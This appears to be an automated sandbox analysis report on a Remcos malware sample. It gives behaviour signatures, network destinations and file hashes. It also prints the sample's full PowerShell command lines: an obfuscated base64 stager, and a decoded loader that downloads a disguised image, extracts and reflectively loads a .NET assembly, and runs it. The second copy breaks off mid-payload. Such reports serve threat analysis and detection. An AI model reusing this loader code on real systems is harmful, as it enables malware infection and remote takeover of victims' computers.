Analysis Overview
SHA256
476ccf639c26a23322184963067c8deadc73a4a6aedc518fd1dc9aef4d583f95
Threat Level: Known bad
The file 476ccf639c26a23322184963067c8deadc73a4a6aedc518fd1dc9aef4d583f95 was found to be: Known bad.
Malicious Activity Summary
Remcos
Blocklisted process makes network request
Checks computer location settings
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Script User-Agent
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-12-08 04:26
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-12-08 04:26
Reported
2023-12-08 04:29
Platform
win7-20231130-en
Max time kernel
121s
Max time network
122s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\wscript.exe | N/A |
| N/A | N/A | C:\Windows\system32\wscript.exe | N/A |
| N/A | N/A | C:\Windows\system32\wscript.exe | N/A |
| N/A | N/A | C:\Windows\system32\wscript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2940 wrote to memory of 2568 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2940 wrote to memory of 2568 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2940 wrote to memory of 2568 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2568 wrote to memory of 2712 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2568 wrote to memory of 2712 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2568 wrote to memory of 2712 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\system32\wscript.exe
wscript.exe "C:\Users\Admin\AppData\Local\Temp\Order NO.Z21239.js"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚VQBy♛♚Gw♛♚I♛♚♛♚9♛♚C♛♚♛♚JwBo♛♚HQ♛♚d♛♚Bw♛♚HM♛♚Og♛♚v♛♚C8♛♚dQBw♛♚Gw♛♚bwBh♛♚GQ♛♚Z♛♚Bl♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBu♛♚HM♛♚LgBj♛♚G8♛♚bQ♛♚u♛♚GI♛♚cg♛♚v♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBz♛♚C8♛♚M♛♚♛♚w♛♚DQ♛♚Lw♛♚2♛♚Dg♛♚Mw♛♚v♛♚DE♛♚OQ♛♚2♛♚C8♛♚bwBy♛♚Gk♛♚ZwBp♛♚G4♛♚YQBs♛♚C8♛♚Z♛♚Bs♛♚Gw♛♚XwBq♛♚HM♛♚LgBq♛♚H♛♚♛♚Zw♛♚/♛♚DE♛♚Nw♛♚w♛♚DE♛♚O♛♚♛♚y♛♚DE♛♚O♛♚♛♚z♛♚DU♛♚Jw♛♚7♛♚CQ♛♚dwBl♛♚GI♛♚QwBs♛♚Gk♛♚ZQBu♛♚HQ♛♚I♛♚♛♚9♛♚C♛♚♛♚TgBl♛♚Hc♛♚LQBP♛♚GI♛♚agBl♛♚GM♛♚d♛♚♛♚g♛♚FM♛♚eQBz♛♚HQ♛♚ZQBt♛♚C4♛♚TgBl♛♚HQ♛♚LgBX♛♚GU♛♚YgBD♛♚Gw♛♚aQBl♛♚G4♛♚d♛♚♛♚7♛♚CQ♛♚aQBt♛♚GE♛♚ZwBl♛♚EI♛♚eQB0♛♚GU♛♚cw♛♚g♛♚D0♛♚I♛♚♛♚k♛♚Hc♛♚ZQBi♛♚EM♛♚b♛♚Bp♛♚GU♛♚bgB0♛♚C4♛♚R♛♚Bv♛♚Hc♛♚bgBs♛♚G8♛♚YQBk♛♚EQ♛♚YQB0♛♚GE♛♚K♛♚♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBV♛♚HI♛♚b♛♚♛♚p♛♚Ds♛♚J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚V♛♚Bl♛♚Hg♛♚d♛♚♛♚g♛♚D0♛♚I♛♚Bb♛♚FM♛♚eQBz♛♚HQ♛♚ZQBt♛♚C4♛♚V♛♚Bl♛♚Hg♛♚d♛♚♛♚u♛♚EU♛♚bgBj♛♚G8♛♚Z♛♚Bp♛♚G4♛♚ZwBd♛♚Do♛♚OgBV♛♚FQ♛♚Rg♛♚4♛♚C4♛♚RwBl♛♚HQ♛♚UwB0♛♚HI♛♚aQBu♛♚Gc♛♚K♛♚♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBC♛♚Hk♛♚d♛♚Bl♛♚HM♛♚KQ♛♚7♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚EY♛♚b♛♚Bh♛♚Gc♛♚I♛♚♛♚9♛♚C♛♚♛♚Jw♛♚8♛♚Dw♛♚QgBB♛♚FM♛♚RQ♛♚2♛♚DQ♛♚XwBT♛♚FQ♛♚QQBS♛♚FQ♛♚Pg♛♚+♛♚Cc♛♚Ow♛♚k♛♚GU♛♚bgBk♛♚EY♛♚b♛♚Bh♛♚Gc♛♚I♛♚♛♚9♛♚C♛♚♛♚Jw♛♚8♛♚Dw♛♚QgBB♛♚FM♛♚RQ♛♚2♛♚DQ♛♚XwBF♛♚E4♛♚R♛♚♛♚+♛♚D4♛♚Jw♛♚7♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚g♛♚D0♛♚I♛♚♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBU♛♚GU♛♚e♛♚B0♛♚C4♛♚SQBu♛♚GQ♛♚ZQB4♛♚E8♛♚Zg♛♚o♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚EY♛♚b♛♚Bh♛♚Gc♛♚KQ♛♚7♛♚CQ♛♚ZQBu♛♚GQ♛♚SQBu♛♚GQ♛♚ZQB4♛♚C♛♚♛♚PQ♛♚g♛♚CQ♛♚aQBt♛♚GE♛♚ZwBl♛♚FQ♛♚ZQB4♛♚HQ♛♚LgBJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚TwBm♛♚Cg♛♚J♛♚Bl♛♚G4♛♚Z♛♚BG♛♚Gw♛♚YQBn♛♚Ck♛♚Ow♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚I♛♚♛♚t♛♚Gc♛♚ZQ♛♚g♛♚D♛♚♛♚I♛♚♛♚t♛♚GE♛♚bgBk♛♚C♛♚♛♚J♛♚Bl♛♚G4♛♚Z♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚I♛♚♛♚t♛♚Gc♛♚d♛♚♛♚g♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚7♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚g♛♚Cs♛♚PQ♛♚g♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚EY♛♚b♛♚Bh♛♚Gc♛♚LgBM♛♚GU♛♚bgBn♛♚HQ♛♚a♛♚♛♚7♛♚CQ♛♚YgBh♛♚HM♛♚ZQ♛♚2♛♚DQ♛♚T♛♚Bl♛♚G4♛♚ZwB0♛♚Gg♛♚I♛♚♛♚9♛♚C♛♚♛♚J♛♚Bl♛♚G4♛♚Z♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚I♛♚♛♚t♛♚C♛♚♛♚J♛♚Bz♛♚HQ♛♚YQBy♛♚HQ♛♚SQBu♛♚GQ♛♚ZQB4♛♚Ds♛♚J♛♚Bi♛♚GE♛♚cwBl♛♚DY♛♚N♛♚BD♛♚G8♛♚bQBt♛♚GE♛♚bgBk♛♚C♛♚♛♚PQ♛♚g♛♚CQ♛♚aQBt♛♚GE♛♚ZwBl♛♚FQ♛♚ZQB4♛♚HQ♛♚LgBT♛♚HU♛♚YgBz♛♚HQ♛♚cgBp♛♚G4♛♚Zw♛♚o♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚s♛♚C♛♚♛♚J♛♚Bi♛♚GE♛♚cwBl♛♚DY♛♚N♛♚BM♛♚GU♛♚bgBn♛♚HQ♛♚a♛♚♛♚p♛♚Ds♛♚J♛♚Bj♛♚G8♛♚bQBt♛♚GE♛♚bgBk♛♚EI♛♚eQB0♛♚GU♛♚cw♛♚g♛♚D0♛♚I♛♚Bb♛♚FM♛♚eQBz♛♚HQ♛♚ZQBt♛♚C4♛♚QwBv♛♚G4♛♚dgBl♛♚HI♛♚d♛♚Bd♛♚Do♛♚OgBG♛♚HI♛♚bwBt♛♚EI♛♚YQBz♛♚GU♛♚Ng♛♚0♛♚FM♛♚d♛♚By♛♚Gk♛♚bgBn♛♚Cg♛♚J♛♚Bi♛♚GE♛♚cwBl♛♚DY♛♚N♛♚BD♛♚G8♛♚bQBt♛♚GE♛♚bgBk♛♚Ck♛♚Ow♛♚k♛♚Gw♛♚bwBh♛♚GQ♛♚ZQBk♛♚EE♛♚cwBz♛♚GU♛♚bQBi♛♚Gw♛♚eQ♛♚g♛♚D0♛♚I♛♚Bb♛♚FM♛♚eQBz♛♚HQ♛♚ZQBt♛♚C4♛♚UgBl♛♚GY♛♚b♛♚Bl♛♚GM♛♚d♛♚Bp♛♚G8♛♚bg♛♚u♛♚EE♛♚cwBz♛♚GU♛♚bQBi♛♚Gw♛♚eQBd♛♚Do♛♚OgBM♛♚G8♛♚YQBk♛♚Cg♛♚J♛♚Bj♛♚G8♛♚bQBt♛♚GE♛♚bgBk♛♚EI♛♚eQB0♛♚GU♛♚cw♛♚p♛♚Ds♛♚J♛♚B0♛♚Hk♛♚c♛♚Bl♛♚C♛♚♛♚PQ♛♚g♛♚CQ♛♚b♛♚Bv♛♚GE♛♚Z♛♚Bl♛♚GQ♛♚QQBz♛♚HM♛♚ZQBt♛♚GI♛♚b♛♚B5♛♚C4♛♚RwBl♛♚HQ♛♚V♛♚B5♛♚H♛♚♛♚ZQ♛♚o♛♚Cc♛♚QwBs♛♚GE♛♚cwBz♛♚Ew♛♚aQBi♛♚HI♛♚YQBy♛♚Hk♛♚Mw♛♚u♛♚EM♛♚b♛♚Bh♛♚HM♛♚cw♛♚x♛♚Cc♛♚KQ♛♚7♛♚CQ♛♚bQBl♛♚HQ♛♚a♛♚Bv♛♚GQ♛♚I♛♚♛♚9♛♚C♛♚♛♚J♛♚B0♛♚Hk♛♚c♛♚Bl♛♚C4♛♚RwBl♛♚HQ♛♚TQBl♛♚HQ♛♚a♛♚Bv♛♚GQ♛♚K♛♚♛♚n♛♚FI♛♚dQBu♛♚Cc♛♚KQ♛♚u♛♚Ek♛♚bgB2♛♚G8♛♚awBl♛♚Cg♛♚J♛♚Bu♛♚HU♛♚b♛♚Bs♛♚Cw♛♚I♛♚Bb♛♚G8♛♚YgBq♛♚GU♛♚YwB0♛♚Fs♛♚XQBd♛♚C♛♚♛♚K♛♚♛♚n♛♚GQ♛♚S♛♚Bo♛♚D♛♚♛♚T♛♚Br♛♚E4♛♚TgBV♛♚Gk♛♚OQBu♛♚GM♛♚bgBj♛♚HY♛♚TwBD♛♚DQ♛♚egBO♛♚EM♛♚N♛♚♛♚0♛♚E0♛♚agBJ♛♚HU♛♚TgBq♛♚Fk♛♚dgBM♛♚Ho♛♚c♛♚B3♛♚GQ♛♚S♛♚BS♛♚G8♛♚Jw♛♚g♛♚Cw♛♚I♛♚♛♚n♛♚GQ♛♚ZgBk♛♚GY♛♚Z♛♚♛♚n♛♚C♛♚♛♚L♛♚♛♚g♛♚Cc♛♚Z♛♚Bm♛♚GQ♛♚Zg♛♚n♛♚C♛♚♛♚L♛♚♛♚g♛♚Cc♛♚Z♛♚Bm♛♚GQ♛♚Zg♛♚n♛♚C♛♚♛♚L♛♚♛♚g♛♚Cc♛♚Z♛♚Bh♛♚GQ♛♚cwBh♛♚Cc♛♚I♛♚♛♚s♛♚C♛♚♛♚JwBk♛♚GU♛♚Jw♛♚g♛♚Cw♛♚I♛♚♛♚n♛♚GM♛♚dQ♛♚n♛♚Ck♛♚KQ♛♚=';$OWjuxd = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($codigo.replace('♛♚','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxd"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/683/196/original/dll_js.jpg?1701821835';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('ClassLibrary3.Class1');$method = $type.GetMethod('Run').Invoke($null, [object[]] ('dHh0LkNNUi9ncncvOC4zNC44MjIuNjYvLzpwdHRo' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | paste.ee | udp |
| US | 172.67.187.200:443 | paste.ee | tcp |
| US | 8.8.8.8:53 | pki.goog | udp |
| US | 216.239.32.29:80 | pki.goog | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | uploaddeimagens.com.br | udp |
| US | 104.21.45.138:443 | uploaddeimagens.com.br | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| GB | 96.17.179.184:80 | apps.identrust.com | tcp |
Files
memory/2568-18-0x000000001B710000-0x000000001B9F2000-memory.dmp
memory/2568-19-0x00000000021D0000-0x00000000021D8000-memory.dmp
memory/2568-20-0x000007FEF54F0000-0x000007FEF5E8D000-memory.dmp
memory/2568-21-0x0000000002200000-0x0000000002280000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | aba4eb063a707d691f8c75c62243e615 |
| SHA1 | 6731d5a587b9d5ff7de2a1b168be27da7a21348d |
| SHA256 | dc366bdef846b1240efa211b036acc8b96c9df2b69596fb8d6ab5e8432008c1a |
| SHA512 | 70b16dd91322cd742fa8dcd543d3582c83ff71dbf5b3243b069d8f0f0ec59cef26f3e67209d6e36f260479ff7ad24ac9a522a1bbb41f72e79b80cc44aed302fc |
memory/2568-22-0x0000000002200000-0x0000000002280000-memory.dmp
memory/2568-28-0x0000000002200000-0x0000000002280000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CYBBDJZ73VHGL3XUCA4E.temp
| MD5 | aba4eb063a707d691f8c75c62243e615 |
| SHA1 | 6731d5a587b9d5ff7de2a1b168be27da7a21348d |
| SHA256 | dc366bdef846b1240efa211b036acc8b96c9df2b69596fb8d6ab5e8432008c1a |
| SHA512 | 70b16dd91322cd742fa8dcd543d3582c83ff71dbf5b3243b069d8f0f0ec59cef26f3e67209d6e36f260479ff7ad24ac9a522a1bbb41f72e79b80cc44aed302fc |
memory/2712-29-0x000007FEF54F0000-0x000007FEF5E8D000-memory.dmp
memory/2712-30-0x00000000029D0000-0x0000000002A50000-memory.dmp
memory/2712-31-0x00000000029D0000-0x0000000002A50000-memory.dmp
memory/2568-32-0x000007FEF54F0000-0x000007FEF5E8D000-memory.dmp
memory/2712-33-0x000007FEF54F0000-0x000007FEF5E8D000-memory.dmp
memory/2712-34-0x00000000029D0000-0x0000000002A50000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Cab1130.tmp
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | b1529796de9598023510a36334ef1147 |
| SHA1 | 7de26a18848dd6cd4d3a5e8bc3672a1375b0c9e5 |
| SHA256 | 8e22c9d226a3b50a668e73f906e5477dc3f8b35e7683997b3143d4d5d17b35c0 |
| SHA512 | 2f28969f68ac5623d4becf5c81e53f385266df25d0a5b1f4a548631e37b2786b2edcb96f607a9d931ab3cd0dfd7745e7783430a27348809f79b58c145f241868 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | a266bb7dcc38a562631361bbf61dd11b |
| SHA1 | 3b1efd3a66ea28b16697394703a72ca340a05bd5 |
| SHA256 | df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e |
| SHA512 | 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | cca981a13aca69f997066820eeca8ea9 |
| SHA1 | 4321c495e20ddce52a1025f0a063d73e9d76eba4 |
| SHA256 | 7f93db5251ea461433650d3baf1068b4b18946f1086621b06f62b4287a982779 |
| SHA512 | 968df4b4c6ef6da04afb65d20045d8a3a2b001fbef7df33601b312421030771cd628ce6cc287cbc5cb4cee426c196f934927dd8a78fe3ecd792a11f5c5b48280 |
C:\Users\Admin\AppData\Local\Temp\Tar1133.tmp
| MD5 | 9c0c641c06238516f27941aa1166d427 |
| SHA1 | 64cd549fb8cf014fcd9312aa7a5b023847b6c977 |
| SHA256 | 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f |
| SHA512 | 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 0eca7d4a6954c268072754da3b19b4d8 |
| SHA1 | 290f048633eee6f1d304e8a75013ab58b0d0ffd8 |
| SHA256 | b3436bd9676f0cb52fb3aae5365b06830a8a254c1f3979415863f5b70ac5e71c |
| SHA512 | 3c7736dda0f7ccef7769af310e4f993ddb1d81b7356ecfe7f88ed1801621501f1c41484287100894aefa7259df9553003fd4a8178162a3f6daf9718865ac06ee |
memory/2712-100-0x0000000002CC0000-0x0000000002CCA000-memory.dmp
memory/2712-101-0x000007FEF54F0000-0x000007FEF5E8D000-memory.dmp
memory/2568-102-0x000007FEF54F0000-0x000007FEF5E8D000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2023-12-08 04:26
Reported
2023-12-08 04:29
Platform
win10v2004-20231127-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
Remcos
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\wscript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3028534956-1709433221-1313273668-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4576 set thread context of 744 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Enumerates physical storage devices
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\wscript.exe
wscript.exe "C:\Users\Admin\AppData\Local\Temp\Order NO.Z21239.js"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚VQBy♛♚Gw♛♚I♛♚♛♚9♛♚C♛♚♛♚JwBo♛♚HQ♛♚d♛♚Bw♛♚HM♛♚Og♛♚v♛♚C8♛♚dQBw♛♚Gw♛♚bwBh♛♚GQ♛♚Z♛♚Bl♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBu♛♚HM♛♚LgBj♛♚G8♛♚bQ♛♚u♛♚GI♛♚cg♛♚v♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBz♛♚C8♛♚M♛♚♛♚w♛♚DQ♛♚Lw♛♚2♛♚Dg♛♚Mw♛♚v♛♚DE♛♚OQ♛♚2♛♚C8♛♚bwBy♛♚Gk♛♚ZwBp♛♚G4♛♚YQBs♛♚C8♛♚Z♛♚Bs♛♚Gw♛♚XwBq♛♚HM♛♚LgBq♛♚H♛♚♛♚Zw♛♚/♛♚DE♛♚Nw♛♚w♛♚DE♛♚O♛♚♛♚y♛♚DE♛♚O♛♚♛♚z♛♚DU♛♚Jw♛♚7♛♚CQ♛♚dwBl♛♚GI♛♚QwBs♛♚Gk♛♚ZQBu♛♚HQ♛♚I♛♚♛♚9♛♚C♛♚♛♚TgBl♛♚Hc♛♚LQBP♛♚GI♛♚agBl♛♚GM♛♚d♛♚♛♚g♛♚FM♛♚eQBz♛♚HQ♛♚ZQBt♛♚C4♛♚TgBl♛♚HQ♛♚LgBX♛♚GU♛♚YgBD♛♚Gw♛♚aQBl♛♚G4♛♚d♛♚♛♚7♛♚CQ♛♚aQBt♛♚GE♛♚ZwBl♛♚EI♛♚eQB0♛♚GU♛♚cw♛♚g♛♚D0♛♚I♛♚♛♚k♛♚Hc♛♚ZQBi♛♚EM♛♚b♛♚Bp♛♚GU♛♚bgB0♛♚C4♛♚R♛♚Bv♛♚Hc♛♚bgBs♛♚G8♛♚YQBk♛♚EQ♛♚YQB0♛♚GE♛♚K♛♚♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBV♛♚HI♛♚b♛♚♛♚p♛♚Ds♛♚J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚V♛♚Bl♛♚Hg♛♚d♛♚♛♚g♛♚D0♛♚I♛♚Bb♛♚FM♛♚eQBz♛♚HQ♛♚ZQBt♛♚C4♛♚V♛♚Bl♛♚Hg♛♚d♛♚♛♚u♛♚EU♛♚bgBj♛♚G8♛♚Z♛♚Bp♛♚G4♛♚ZwBd♛♚Do♛♚OgBV♛♚FQ♛♚Rg♛♚4♛♚C4♛♚RwBl♛♚HQ♛♚UwB0♛♚HI♛♚aQBu♛♚Gc♛♚K♛♚♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBC♛♚Hk♛♚d♛♚Bl♛♚HM♛♚KQ♛♚7♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚EY♛♚b♛♚Bh♛♚Gc♛♚I♛♚♛♚9♛♚C♛♚♛♚Jw♛♚8♛♚Dw♛♚QgBB♛♚FM♛♚RQ♛♚2♛♚DQ♛♚XwBT♛♚FQ♛♚QQBS♛♚FQ♛♚Pg♛♚+♛♚Cc♛♚Ow♛♚k♛♚GU♛♚bgBk♛♚EY♛♚b♛♚Bh♛♚Gc♛♚I♛♚♛♚9♛♚C♛♚♛♚Jw♛♚8♛♚Dw♛♚QgBB♛♚FM♛♚RQ♛♚2♛♚DQ♛♚XwBF♛♚E4♛♚R♛♚♛♚+♛♚D4♛♚Jw♛♚7♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚g♛♚D0♛♚I♛♚♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBU♛♚GU♛♚e♛♚B0♛♚C4♛♚SQBu♛♚GQ♛♚ZQB4♛♚E8♛♚Zg♛♚o♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚EY♛♚b♛♚Bh♛♚Gc♛♚KQ♛♚7♛♚CQ♛♚ZQBu♛♚GQ♛♚SQBu♛♚GQ♛♚ZQB4♛♚C♛♚♛♚PQ♛♚g♛♚CQ♛♚aQBt♛♚GE♛♚ZwBl♛♚FQ♛♚ZQB4♛♚HQ♛♚LgBJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚TwBm♛♚Cg♛♚J♛♚Bl♛♚G4♛♚Z♛♚BG♛♚Gw♛♚YQBn♛♚Ck♛♚Ow♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚I♛♚♛♚t♛♚Gc♛♚ZQ♛♚g♛♚D♛♚♛♚I♛♚♛♚t♛♚GE♛♚bgBk♛♚C♛♚♛♚J♛♚Bl♛♚G4♛♚Z♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚I♛♚♛♚t♛♚Gc♛♚d♛♚♛♚g♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚7♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚g♛♚Cs♛♚PQ♛♚g♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚EY♛♚b♛♚Bh♛♚Gc♛♚LgBM♛♚GU♛♚bgBn♛♚HQ♛♚a♛♚♛♚7♛♚CQ♛♚YgBh♛♚HM♛♚ZQ♛♚2♛♚DQ♛♚T♛♚Bl♛♚G4♛♚ZwB0♛♚Gg♛♚I♛♚♛♚9♛♚C♛♚♛♚J♛♚Bl♛♚G4♛♚Z♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚I♛♚♛♚t♛♚C♛♚♛♚J♛♚Bz♛♚HQ♛♚YQBy♛♚HQ♛♚SQBu♛♚GQ♛♚ZQB4♛♚Ds♛♚J♛♚Bi♛♚GE♛♚cwBl♛